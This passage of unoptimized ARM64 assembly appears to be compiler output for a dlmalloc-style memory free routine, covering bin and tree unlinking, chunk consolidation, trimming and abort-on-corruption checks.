str w8, [sp, #64] ; 4-byte Folded Spill
b LBB4_34
LBB4_34:
ldr w8, [sp, #64] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_36
b LBB4_35
LBB4_35:
ldur x8, [x29, #-112]
ldur x9, [x29, #-120]
str x8, [x9, #24]
ldur x8, [x29, #-120]
ldur x9, [x29, #-112]
str x8, [x9, #16]
b LBB4_37
LBB4_36:
bl _abort
LBB4_37:
b LBB4_50
LBB4_38:
ldur x8, [x29, #-96]
add x9, x8, #40
stur x9, [x29, #-128]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-112]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_40
b LBB4_39
LBB4_39:
ldur x8, [x29, #-96]
add x9, x8, #32
stur x9, [x29, #-128]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_49
b LBB4_40
LBB4_40:
b LBB4_41
LBB4_41: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-112]
add x9, x8, #40
stur x9, [x29, #-136]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_43
b LBB4_42
LBB4_42: ; in Loop: Header=BB4_41 Depth=1
ldur x8, [x29, #-112]
add x9, x8, #32
stur x9, [x29, #-136]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #60] ; 4-byte Folded Spill
b LBB4_43
LBB4_43: ; in Loop: Header=BB4_41 Depth=1
ldr w8, [sp, #60] ; 4-byte Folded Reload
tbz w8, #0, LBB4_45
b LBB4_44
LBB4_44: ; in Loop: Header=BB4_41 Depth=1
ldur x8, [x29, #-136]
mov x9, x8
stur x9, [x29, #-128]
ldr x8, [x8]
stur x8, [x29, #-112]
b LBB4_41
LBB4_45:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-128]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_47
b LBB4_46
LBB4_46:
ldur x8, [x29, #-128]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB4_48
LBB4_47:
bl _abort
LBB4_48:
b LBB4_49
LBB4_49:
b LBB4_50
LBB4_50:
ldur x8, [x29, #-104]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_78
b LBB4_51
LBB4_51:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldur x9, [x29, #-96]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
stur x8, [x29, #-144]
ldur x8, [x29, #-96]
ldur x9, [x29, #-144]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_55
b LBB4_52
LBB4_52:
ldur x8, [x29, #-112]
ldur x10, [x29, #-144]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_54
b LBB4_53
LBB4_53:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-96]
ldr w10, [x8, #56]
mov w8, #1
lsl w10, w8, w10
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB4_54
LBB4_54:
b LBB4_62
LBB4_55:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-104]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_60
b LBB4_56
LBB4_56:
ldur x8, [x29, #-104]
ldr x8, [x8, #32]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_58
b LBB4_57
LBB4_57:
ldur x8, [x29, #-112]
ldur x9, [x29, #-104]
str x8, [x9, #32]
b LBB4_59
LBB4_58:
ldur x8, [x29, #-112]
ldur x9, [x29, #-104]
str x8, [x9, #40]
b LBB4_59
LBB4_59:
b LBB4_61
LBB4_60:
bl _abort
LBB4_61:
b LBB4_62
LBB4_62:
ldur x8, [x29, #-112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_77
b LBB4_63
LBB4_63:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-112]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_75
b LBB4_64
LBB4_64:
ldur x8, [x29, #-104]
ldur x9, [x29, #-112]
str x8, [x9, #48]
ldur x8, [x29, #-96]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-152]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_69
b LBB4_65
LBB4_65:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-152]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_67
b LBB4_66
LBB4_66:
ldur x8, [x29, #-152]
ldur x9, [x29, #-112]
str x8, [x9, #32]
ldur x8, [x29, #-112]
ldur x9, [x29, #-152]
str x8, [x9, #48]
b LBB4_68
LBB4_67:
bl _abort
LBB4_68:
b LBB4_69
LBB4_69:
ldur x8, [x29, #-96]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-160]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_74
b LBB4_70
LBB4_70:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-160]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_72
b LBB4_71
LBB4_71:
ldur x8, [x29, #-160]
ldur x9, [x29, #-112]
str x8, [x9, #40]
ldur x8, [x29, #-112]
ldur x9, [x29, #-160]
str x8, [x9, #48]
b LBB4_73
LBB4_72:
bl _abort
LBB4_73:
b LBB4_74
LBB4_74:
b LBB4_76
LBB4_75:
bl _abort
LBB4_76:
b LBB4_77
LBB4_77:
b LBB4_78
LBB4_78:
b LBB4_79
LBB4_79:
b LBB4_83
LBB4_80:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #3
cset w8, ne
tbnz w8, #0, LBB4_82
b LBB4_81
LBB4_81:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
str x8, [x9, #8]
ldur x9, [x29, #-48]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldur x10, [x29, #-40]
str x8, [x9, x10]
b LBB4_214
LBB4_82:
b LBB4_83
LBB4_83:
b LBB4_85
LBB4_84:
b LBB4_213
LBB4_85:
b LBB4_86
LBB4_86:
b LBB4_87
LBB4_87:
ldur x8, [x29, #-32]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, hs
mov w9, #0
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_89
b LBB4_88
LBB4_88:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
ands x8, x8, #0x1
cset w8, ne
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB4_89
LBB4_89:
ldr w8, [sp, #56] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_211
b LBB4_90
LBB4_90:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
ands x8, x8, #0x2
cset w8, ne
tbnz w8, #0, LBB4_172
b LBB4_91
LBB4_91:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-48]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_97
b LBB4_92
LBB4_92:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x10, [x29, #-40]
ldr x8, [x9, #16]
add x8, x8, x10
str x8, [x9, #16]
stur x8, [x29, #-168]
ldur x8, [x29, #-32]
str x8, [x9, #40]
ldur x8, [x29, #-168]
orr x8, x8, #0x1
ldur x10, [x29, #-32]
str x8, [x10, #8]
ldur x8, [x29, #-32]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_94
b LBB4_93
LBB4_93:
ldr x8, [sp, #88] ; 8-byte Folded Reload
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
str xzr, [x8, #8]
b LBB4_94
LBB4_94:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-168]
ldr x9, [x9, #48]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB4_96
b LBB4_95
LBB4_95:
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
mov x1, #0
bl _sys_trim
b LBB4_96
LBB4_96:
b LBB4_214
LBB4_97:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-48]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_99
b LBB4_98
LBB4_98:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x10, [x29, #-40]
ldr x8, [x9, #8]
add x8, x8, x10
str x8, [x9, #8]
stur x8, [x29, #-176]
ldur x8, [x29, #-32]
str x8, [x9, #32]
ldur x8, [x29, #-176]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-176]
ldur x9, [x29, #-32]
ldur x10, [x29, #-176]
str x8, [x9, x10]
b LBB4_214
LBB4_99:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-184]
ldur x9, [x29, #-184]
ldur x8, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-40]
ldur x8, [x29, #-184]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB4_118
b LBB4_100
LBB4_100:
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldur x8, [x29, #-48]
ldr x8, [x8, #16]
stur x8, [x29, #-192]
ldur x8, [x29, #-48]
ldr x8, [x8, #24]
stur x8, [x29, #-200]
ldur x8, [x29, #-184]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-204]
ldur x8, [x29, #-192]
ldur w10, [x29, #-204]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #52] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_104
b LBB4_101
LBB4_101:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-192]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #48] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_103
b LBB4_102
LBB4_102:
ldur x8, [x29, #-192]
ldr x8, [x8, #24]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #48] ; 4-byte Folded Spill
b LBB4_103
LBB4_103:
ldr w8, [sp, #48] ; 4-byte Folded Reload
str w8, [sp, #52] ; 4-byte Folded Spill
b LBB4_104
LBB4_104:
ldr w8, [sp, #52] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_116
b LBB4_105
LBB4_105:
ldur x8, [x29, #-200]
ldur x9, [x29, #-192]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_107
b LBB4_106
LBB4_106:
ldur w9, [x29, #-204]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
bic w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB4_115
LBB4_107:
ldr x9, [sp, #104] ; 8-byte Folded Reload
ldur x8, [x29, #-200]
ldur w10, [x29, #-204]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_111
b LBB4_108
LBB4_108:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-200]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #40] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_110
b LBB4_109
LBB4_109:
ldur x8, [x29, #-200]
ldr x8, [x8, #16]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB4_110
LBB4_110:
ldr w8, [sp, #40] ; 4-byte Folded Reload
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB4_111
LBB4_111:
ldr w8, [sp, #44] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_113
b LBB4_112
LBB4_112:
ldur x8, [x29, #-200]
ldur x9, [x29, #-192]
str x8, [x9, #24]
ldur x8, [x29, #-192]
ldur x9, [x29, #-200]
str x8, [x9, #16]
b LBB4_114
LBB4_113:
bl _abort
LBB4_114:
b LBB4_115
LBB4_115:
b LBB4_117
LBB4_116:
bl _abort
LBB4_117:
b LBB4_167
LBB4_118:
ldur x8, [x29, #-48]
stur x8, [x29, #-216]
ldur x8, [x29, #-216]
ldr x8, [x8, #48]
stur x8, [x29, #-224]
ldur x8, [x29, #-216]
ldr x8, [x8, #24]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_126
b LBB4_119
LBB4_119:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-216]
ldr x8, [x8, #16]
stur x8, [x29, #-240]
ldur x8, [x29, #-216]
ldr x8, [x8, #24]
stur x8, [x29, #-232]
ldur x8, [x29, #-240]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_122
b LBB4_120
LBB4_120:
ldur x8, [x29, #-240]
ldr x8, [x8, #24]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_122
b LBB4_121
LBB4_121:
ldur x8, [x29, #-232]
ldr x8, [x8, #16]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB4_122
LBB4_122:
ldr w8, [sp, #36] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_124
b LBB4_123
LBB4_123:
ldur x8, [x29, #-232]
ldur x9, [x29, #-240]
str x8, [x9, #24]
ldur x8, [x29, #-240]
ldur x9, [x29, #-232]
str x8, [x9, #16]
b LBB4_125
LBB4_124:
bl _abort
LBB4_125:
b LBB4_138
LBB4_126:
ldur x8, [x29, #-216]
add x9, x8, #40
str x9, [sp, #248]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-232]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_128
b LBB4_127
LBB4_127:
ldur x8, [x29, #-216]
add x9, x8, #32
str x9, [sp, #248]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-232]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_137
b LBB4_128
LBB4_128:
b LBB4_129
LBB4_129: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-232]
add x9, x8, #40
str x9, [sp, #240]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_131
b LBB4_130
LBB4_130: ; in Loop: Header=BB4_129 Depth=1
ldur x8, [x29, #-232]
add x9, x8, #32
str x9, [sp, #240]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB4_131
LBB4_131: ; in Loop: Header=BB4_129 Depth=1
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB4_133
b LBB4_132
LBB4_132: ; in Loop: Header=BB4_129 Depth=1
ldr x8, [sp, #240]
mov x9, x8
str x9, [sp, #248]
ldr x8, [x8]
stur x8, [x29, #-232]
b LBB4_129
LBB4_133:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #248]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_135
b LBB4_134
LBB4_134:
ldr x8, [sp, #248]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB4_136
LBB4_135:
bl _abort
LBB4_136:
b LBB4_137
LBB4_137:
b LBB4_138
LBB4_138:
ldur x8, [x29, #-224]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_166
b LBB4_139
LBB4_139:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldur x9, [x29, #-216]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #232]
ldur x8, [x29, #-216]
ldr x9, [sp, #232]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_143
b LBB4_140
LBB4_140:
ldur x8, [x29, #-232]
ldr x10, [sp, #232]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_142
b LBB4_141
LBB4_141:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-216]
ldr w10, [x8, #56]
mov w8, #1
lsl w10, w8, w10
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB4_142
LBB4_142:
b LBB4_150
LBB4_143:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-224]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_148
b LBB4_144
LBB4_144:
ldur x8, [x29, #-224]
ldr x8, [x8, #32]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_146
b LBB4_145
LBB4_145:
ldur x8, [x29, #-232]
ldur x9, [x29, #-224]
str x8, [x9, #32]
b LBB4_147
LBB4_146:
ldur x8, [x29, #-232]
ldur x9, [x29, #-224]
str x8, [x9, #40]
b LBB4_147
LBB4_147:
b LBB4_149
LBB4_148:
bl _abort
LBB4_149:
b LBB4_150
LBB4_150:
ldur x8, [x29, #-232]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_165
b LBB4_151
LBB4_151:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-232]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_163
b LBB4_152
LBB4_152:
ldur x8, [x29, #-224]
ldur x9, [x29, #-232]
str x8, [x9, #48]
ldur x8, [x29, #-216]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #224]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_157
b LBB4_153
LBB4_153:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #224]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_155
b LBB4_154
LBB4_154:
ldr x8, [sp, #224]
ldur x9, [x29, #-232]
str x8, [x9, #32]
ldur x8, [x29, #-232]
ldr x9, [sp, #224]
str x8, [x9, #48]
b LBB4_156
LBB4_155:
bl _abort
LBB4_156:
b LBB4_157
LBB4_157:
ldur x8, [x29, #-216]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #216]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_162
b LBB4_158
LBB4_158:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #216]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_160
b LBB4_159
LBB4_159:
ldr x8, [sp, #216]
ldur x9, [x29, #-232]
str x8, [x9, #40]
ldur x8, [x29, #-232]
ldr x9, [sp, #216]
str x8, [x9, #48]
b LBB4_161
LBB4_160:
bl _abort
LBB4_161:
b LBB4_162
LBB4_162:
b LBB4_164
LBB4_163:
bl _abort
LBB4_164:
b LBB4_165
LBB4_165:
b LBB4_166
LBB4_166:
b LBB4_167
LBB4_167:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x10, [x29, #-32]
str x8, [x10, #8]
ldur x8, [x29, #-40]
ldur x10, [x29, #-32]
ldur x11, [x29, #-40]
str x8, [x10, x11]
ldur x8, [x29, #-32]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_169
b LBB4_168
LBB4_168:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
str x8, [x9, #8]
b LBB4_214
LBB4_169:
b LBB4_170
LBB4_170:
b LBB4_171
LBB4_171:
b LBB4_173
LBB4_172:
ldur x9, [x29, #-48]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldur x10, [x29, #-40]
str x8, [x9, x10]
b LBB4_173
LBB4_173:
ldur x8, [x29, #-40]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB4_181
b LBB4_174
LBB4_174:
ldr x8, [sp, #104] ; 8-byte Folded Reload
ldur x9, [x29, #-40]
lsr x9, x9, #3
; kill: def $w9 killed $w9 killed $x9
str w9, [sp, #212]
ldr w9, [sp, #212]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #200]
ldr x8, [sp, #200]
str x8, [sp, #192]
adrp x8, __gm_@PAGE
ldr w8, [x8, __gm_@PAGEOFF]
ldr w10, [sp, #212]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB4_176
b LBB4_175
LBB4_175:
ldr w9, [sp, #212]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
orr w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB4_180
LBB4_176:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #200]
ldr x8, [x8, #16]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_178
b LBB4_177
LBB4_177:
ldr x8, [sp, #200]
ldr x8, [x8, #16]
str x8, [sp, #192]
b LBB4_179
LBB4_178:
bl _abort
LBB4_179:
b LBB4_180
LBB4_180:
ldur x8, [x29, #-32]
ldr x9, [sp, #200]
str x8, [x9, #16]
ldur x8, [x29, #-32]
ldr x9, [sp, #192]
str x8, [x9, #24]
ldr x8, [sp, #192]
ldur x9, [x29, #-32]
str x8, [x9, #16]
ldr x8, [sp, #200]
ldur x9, [x29, #-32]
str x8, [x9, #24]
b LBB4_210
LBB4_181:
ldur x8, [x29, #-32]
str x8, [sp, #184]
ldur x8, [x29, #-40]
lsr x8, x8, #8
str x8, [sp, #160]
ldr x8, [sp, #160]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_183
b LBB4_182
LBB4_182:
str wzr, [sp, #172]
b LBB4_187
LBB4_183:
ldr x8, [sp, #160]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB4_185
b LBB4_184
LBB4_184:
mov w8, #31
str w8, [sp, #172]
b LBB4_186
LBB4_185:
ldr x8, [sp, #160]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #156]
ldr w8, [sp, #156]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #152]
ldr w9, [sp, #152]
ldr w8, [sp, #156]
lsl w8, w8, w9
str w8, [sp, #156]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #148]
ldr w9, [sp, #148]
ldr w8, [sp, #152]
add w8, w8, w9
str w8, [sp, #152]
ldr w9, [sp, #148]
ldr w8, [sp, #156]
lsl w8, w8, w9
str w8, [sp, #156]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #148]
ldr w8, [sp, #152]
add w8, w8, w9
str w8, [sp, #152]
ldr w9, [sp, #152]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #148]
ldr w9, [sp, #156]
lsl w9, w9, w10
str w9, [sp, #156]
add w8, w8, w9, lsr #15
str w8, [sp, #148]
ldr w8, [sp, #148]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-40]
ldr w10, [sp, #148]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #172]
b LBB4_186
LBB4_186:
b LBB4_187
LBB4_187:
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldr x9, [sp, #96] ; 8-byte Folded Reload
ldr w10, [sp, #172]
; kill: def $x10 killed $w10
add x9, x9, x10, lsl #3
str x9, [sp, #176]
ldr w9, [sp, #172]
ldr x10, [sp, #184]
str w9, [x10, #56]
ldr x9, [sp, #184]
; kill: def $x10 killed $xzr
str xzr, [x9, #40]
ldr x9, [sp, #184]
str xzr, [x9, #32]
ldr w8, [x8, #4]
ldr w10, [sp, #172]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB4_189
b LBB4_188
LBB4_188:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr w10, [sp, #172]
mov w8, #1
lsl w10, w8, w10
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldr x8, [sp, #184]
ldr x9, [sp, #176]
str x8, [x9]
ldr x8, [sp, #176]
ldr x9, [sp, #184]
str x8, [x9, #48]
ldr x8, [sp, #184]
ldr x9, [sp, #184]
str x8, [x9, #24]
ldr x9, [sp, #184]
str x8, [x9, #16]
b LBB4_207
LBB4_189:
ldr x8, [sp, #176]
ldr x8, [x8]
str x8, [sp, #136]
ldur x8, [x29, #-40]
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w8, [sp, #172]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB4_191
b LBB4_190
LBB4_190:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB4_192
LBB4_191:
ldr w8, [sp, #172]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB4_192
LBB4_192:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #128]
b LBB4_193
LBB4_193: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #136]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_200
b LBB4_194
LBB4_194: ; in Loop: Header=BB4_193 Depth=1
ldr x8, [sp, #136]
add x8, x8, #32
ldr x9, [sp, #128]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #120]
ldr x8, [sp, #128]
lsl x8, x8, #1
str x8, [sp, #128]
ldr x8, [sp, #120]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_196
b LBB4_195
LBB4_195: ; in Loop: Header=BB4_193 Depth=1
ldr x8, [sp, #120]
ldr x8, [x8]
str x8, [sp, #136]
b LBB4_199
LBB4_196:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #120]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_198
b LBB4_197
LBB4_197:
ldr x8, [sp, #184]
ldr x9, [sp, #120]
str x8, [x9]
ldr x8, [sp, #136]
ldr x9, [sp, #184]
str x8, [x9, #48]
ldr x8, [sp, #184]
ldr x9, [sp, #184]
str x8, [x9, #24]
ldr x9, [sp, #184]
str x8, [x9, #16]
b LBB4_206
LBB4_198:
bl _abort
LBB4_199: ; in Loop: Header=BB4_193 Depth=1
